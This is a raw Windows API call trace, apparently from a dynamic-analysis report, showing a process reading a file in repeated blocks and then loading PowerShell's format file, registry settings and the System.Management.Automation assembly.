	[0395.944] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.944] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.944] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.944] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.944] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.945] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.945] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.945] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.945] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.945] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.946] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.946] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.946] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.946] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.947] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.278] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.280] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.280] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.280] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.280] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.281] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.281] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.281] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.281] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.281] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.281] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.281] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.282] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.282] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.282] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.282] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.282] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.282] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.282] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.282] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.283] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.283] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.283] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.283] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.283] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.283] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.283] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.283] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.284] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.284] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.284] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0396.284] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0xf37, lpOverlapped=0x0) returned 1
	[0396.284] ReadFile (in: hFile=0x2f8, lpBuffer=0x3622fff, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3622fff*, lpNumberOfBytesRead=0x16d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0396.284] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0396.284] CloseHandle (hObject=0x2f8) returned 1
	[0396.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0396.285] SetErrorMode (uMode=0x1) returned 0x1
	[0396.285] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d360 | out: lpFileInformation=0x16d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0396.285] SetErrorMode (uMode=0x1) returned 0x1
	[0396.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0396.285] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d448 | out: phkResult=0x16d448*=0x2f8) returned 0x0
	[0396.285] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3cc, lpData=0x0, lpcbData=0x16d3c8*=0x0 | out: lpType=0x16d3cc*=0x1, lpData=0x0, lpcbData=0x16d3c8*=0x56) returned 0x0
	[0396.285] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c40b0
	[0396.285] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d39c, lpData=0x1b7c40b0, lpcbData=0x16d398*=0x56 | out: lpType=0x16d39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d398*=0x56) returned 0x0
	[0396.285] CoTaskMemFree (pv=0x1b7c40b0) 
	[0396.285] RegCloseKey (hKey=0x2f8) returned 0x0
	[0396.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0396.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0396.294] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x223e371c, Data2=0x5bd0, Data3=0x44c3, Data4=([0]=0xaf, [1]=0x62, [2]=0x72, [3]=0xfe, [4]=0x88, [5]=0x25, [6]=0x30, [7]=0x28))) returned 0x0
	[0396.295] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x706bfdf7, Data2=0x5bbb, Data3=0x41a5, Data4=([0]=0x8a, [1]=0x2d, [2]=0x49, [3]=0x55, [4]=0xa8, [5]=0xcc, [6]=0xb6, [7]=0xce))) returned 0x0
	[0396.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.665] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xcba61ef, Data2=0xc434, Data3=0x4840, Data4=([0]=0xad, [1]=0x2a, [2]=0xc6, [3]=0xc3, [4]=0xc8, [5]=0x64, [6]=0xb5, [7]=0x20))) returned 0x0
	[0396.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
